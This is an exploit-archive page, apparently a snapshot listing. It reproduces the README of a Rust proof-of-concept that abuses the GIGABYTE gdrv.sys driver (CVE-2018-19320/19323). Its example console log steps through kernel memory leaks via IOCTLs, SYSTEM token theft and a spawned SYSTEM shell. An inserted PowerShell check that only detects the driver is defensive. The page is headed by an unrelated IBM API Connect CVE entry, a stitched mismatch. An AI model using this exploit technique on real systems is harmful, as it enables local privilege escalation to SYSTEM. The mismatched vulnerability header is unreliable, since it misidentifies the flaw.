Associated vulnerability
Title: IBM API Connect security vulnerability (CVE-2018-1932)
Description: IBM API Connect (also known as APIConnect) is an integrated solution from IBM (USA) for managing the API lifecycle. It supports creating, running, managing and securing APIs and microservices. The role-based access control feature of the management server in IBM API Connect versions 5.0.0.0 through 5.0.8.4 has a security vulnerability. An attacker can exploit it to obtain highly sensitive information.
Description
Rust POC for CVE-2018-1932X kernel driver vulnerabilities
Introduction
# CVE-2018-1932X (Rust Exploit POC) for GIGABYTE APP Center v1.05.21 and earlier
> Just because your target is memory unsafe doesn't mean your exploit has to be!
Vulnerabilities used:
* [CVE-2018-19320](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-19320) - ring0 memcpy-like functionality
* [CVE-2018-19323](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-19323) - read and write Model-Specific Registers (MSRs)
Tested on:
* 20H1: `Windows 10 Kernel Version 19041 MP (1 procs) Free x64`
## References
* [Vergilius Project: Kernel Structs](https://www.vergiliusproject.com/kernels/x64/Windows%2010%20|%202016/2004%2020H1%20(May%202020%20Update))
* [Gigabyte Patch Announcement](https://www.gigabyte.com/Support/Security/1801)
* [_KPCR Details](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/amd64_x/kpcr.htm)
## Requirements
* x64 only
* One of the tested builds listed above
* Loaded GIGABYTE driver: [gdrv.sys](driver/gdrv.sys)
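The PoC only works while the GIGABYTE `gdrv.sys` driver is loaded, so the practical mitigation is to find hosts that still have it installed and remove or update it per the Gigabyte advisory linked below. The following PowerShell check is an added example for that purpose; it is not part of this repository. It assumes only the driver file name `gdrv.sys` from the README and matches the service by its binary path rather than guessing a service name; it never opens the `\\.\GIO` device.

```powershell
# Added defensive check (not part of the CVE-2018-1932X PoC repository):
# report whether the GIGABYTE gdrv.sys kernel driver named in the README is
# installed or running on this host, with its path, SHA-256 and signer, so the
# result can be compared against Gigabyte's patched release.
# Assumption: only the file name 'gdrv.sys' is known; the service name is not.

function Find-GdrvDriver {
    [CmdletBinding()]
    param()

    # Win32_SystemDriver lists every kernel driver service with its binary path.
    $drivers = Get-CimInstance -ClassName Win32_SystemDriver |
        Where-Object { $_.PathName -and ($_.PathName -match 'gdrv\.sys') }

    if (-not $drivers) {
        Write-Output "No gdrv.sys driver service found."
        return
    }

    foreach ($d in $drivers) {
        # PathName may carry a \??\ prefix and quotes; normalise it for file access.
        $path = ($d.PathName -replace '^\\\?\?\\', '') -replace '"', ''

        if (Test-Path -LiteralPath $path) {
            $hash   = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            $signer = (Get-AuthenticodeSignature -FilePath $path).SignerCertificate.Subject
        } else {
            $hash   = 'file not found'
            $signer = 'n/a'
        }

        [PSCustomObject]@{
            Service   = $d.Name
            State     = $d.State        # 'Running' means the \\.\GIO device is reachable
            StartMode = $d.StartMode    # 'Auto' means it comes back after every reboot
            Path      = $path
            SHA256    = $hash
            Signer    = $signer
        }
    }
}

Find-GdrvDriver | Format-List
```

Run it in an elevated PowerShell on each host you manage. A `State` of `Running` means the driver's IOCTL interface is currently exposed to any local user; a `StartMode` of `Auto` means stopping the service alone is not enough and the driver should be uninstalled or replaced with the patched APP Center build.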
## Usage
`.\CVE-2018-1932X.exe`
## Example
```
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X
Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
[+] Leaked _KPCR: ffffe48159d88000
[*] Address _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KPRCB: ffffe48159d88180
[*] Address _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KTHREAD: ffffb50b14d16080
[*] Address _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KPROCESS: ffffb50b1507f080
[*] Address PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked PID: 2092
[+] Known PID: 2092
Walking Active Process Links...
[*] Address ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _EPROCESS: fffff8015561e060 (PID: 0)
[*] Address ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Current Token: ffff9708cac8306e
[+] System Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Current Token: ffff9708c567b047
Spawning Process...
[+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO
```
Spawned Powershell:
```
PS C:\> whoami
nt authority\system
```
## Vulnerable Blocks
### Memcpy (IOCTL 0x0C3502808)

### MSR Manipulation (IOCTL 0x0C3502580)

File snapshot
```
[4.0K] /data/pocs/283ba9e599ac3bb8f59a0b570f2f9e898022f98b
├── [ 226] Cargo.toml
├── [4.0K] docs
│   ├── [ 72K] memcpy_blocks.png
│   └── [ 50K] msr_blocks.png
├── [4.0K] driver
│   └── [ 26K] gdrv.sys
├── [2.9K] README.md
└── [4.0K] src
    ├── [2.1K] gio.rs
    ├── [2.0K] kdriver.rs
    └── [4.6K] main.rs

3 directories, 8 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC archive. Thank you for your support.